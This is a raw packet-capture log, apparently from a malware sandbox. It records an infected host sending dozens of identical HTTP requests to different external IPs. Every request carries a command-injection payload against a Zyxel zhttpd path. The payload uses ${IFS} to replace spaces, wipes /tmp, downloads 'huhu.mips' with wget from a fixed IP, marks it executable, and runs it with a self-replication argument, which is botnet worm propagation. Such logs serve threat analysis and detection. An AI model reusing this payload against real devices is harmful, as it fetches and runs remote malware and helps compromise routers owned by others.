                                      Jan 19, 2024 17:29:36.857804060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5369192.168.2.1446160109.32.23.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857842922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5370192.168.2.144831695.87.155.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857908964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5371192.168.2.1448270210.159.205.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857924938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5372192.168.2.1448922111.245.27.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857949972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5373192.168.2.144445260.52.141.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858005047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5374192.168.2.1434708205.63.35.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858045101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5375192.168.2.1435976111.93.213.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858062983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5376192.168.2.1453218168.161.7.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858103991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5377192.168.2.1433252149.170.230.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858136892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5378192.168.2.1434076166.64.9.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858191967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5379192.168.2.1445860196.88.255.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858223915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5380192.168.2.1438538137.138.93.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858263016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5381192.168.2.1452798125.30.155.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858304977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5382192.168.2.1446790207.202.196.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858341932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5383192.168.2.144094878.248.157.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858381033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5384192.168.2.145995269.107.78.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858418941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5385192.168.2.1454534109.114.20.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858472109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5386192.168.2.1439970185.126.184.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858508110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5387192.168.2.145528831.136.85.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858555079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5388192.168.2.1441926124.123.244.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858572006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5389192.168.2.143350227.234.175.169443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858598948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5390192.168.2.1441954143.108.180.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858642101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5391192.168.2.1446056194.117.252.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858679056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5392192.168.2.1446186205.54.125.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858731031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5393192.168.2.144536020.0.238.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858771086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5394192.168.2.144566879.84.212.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858800888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5395192.168.2.145078469.46.169.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858854055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5396192.168.2.145395661.34.172.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858900070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5397192.168.2.145075679.3.95.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858946085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5398192.168.2.1438280163.200.146.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.858973026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5399192.168.2.145452647.0.160.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859023094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5400192.168.2.1456048159.226.43.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859062910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5401192.168.2.1458138137.236.66.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859098911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5402192.168.2.1441116168.61.159.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859124899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5403192.168.2.1438562150.45.240.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859164953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5404192.168.2.1433538115.241.132.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859215021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5405192.168.2.143698492.113.130.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859277964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5406192.168.2.1454094136.165.42.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859303951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5407192.168.2.1444004182.117.107.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859344006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5408192.168.2.145687480.154.227.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859392881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5409192.168.2.1434474154.52.255.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859436989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5410192.168.2.1439476142.28.220.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859482050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5411192.168.2.1439540116.143.142.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859513044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5412192.168.2.1445294166.97.127.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859564066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5413192.168.2.1440616118.141.203.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859599113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5414192.168.2.1433092153.178.252.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859648943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5415192.168.2.146072838.27.156.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859689951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5416192.168.2.1449806221.254.174.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859733105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5417192.168.2.144702652.51.79.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859749079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5418192.168.2.1434100111.137.46.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859790087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5419192.168.2.144480034.186.73.100443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859834909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5420192.168.2.1460470188.166.211.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859885931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5421192.168.2.1434668183.209.199.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859914064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5422192.168.2.1458750150.3.136.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859952927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5423192.168.2.143595473.229.111.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.859992981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5424192.168.2.1448090114.131.138.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860047102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5425192.168.2.1441766109.134.193.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860071898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5426192.168.2.143457275.215.124.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860105991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5427192.168.2.144079096.129.107.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860152960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5428192.168.2.14503469.38.69.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860193968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5429192.168.2.1460896206.98.11.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860243082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5430192.168.2.1437218107.131.154.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860287905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5431192.168.2.145460467.215.3.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.860347986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5432192.168.2.1437600154.47.149.103443
                                      TimestampBytes transferredDirectionData
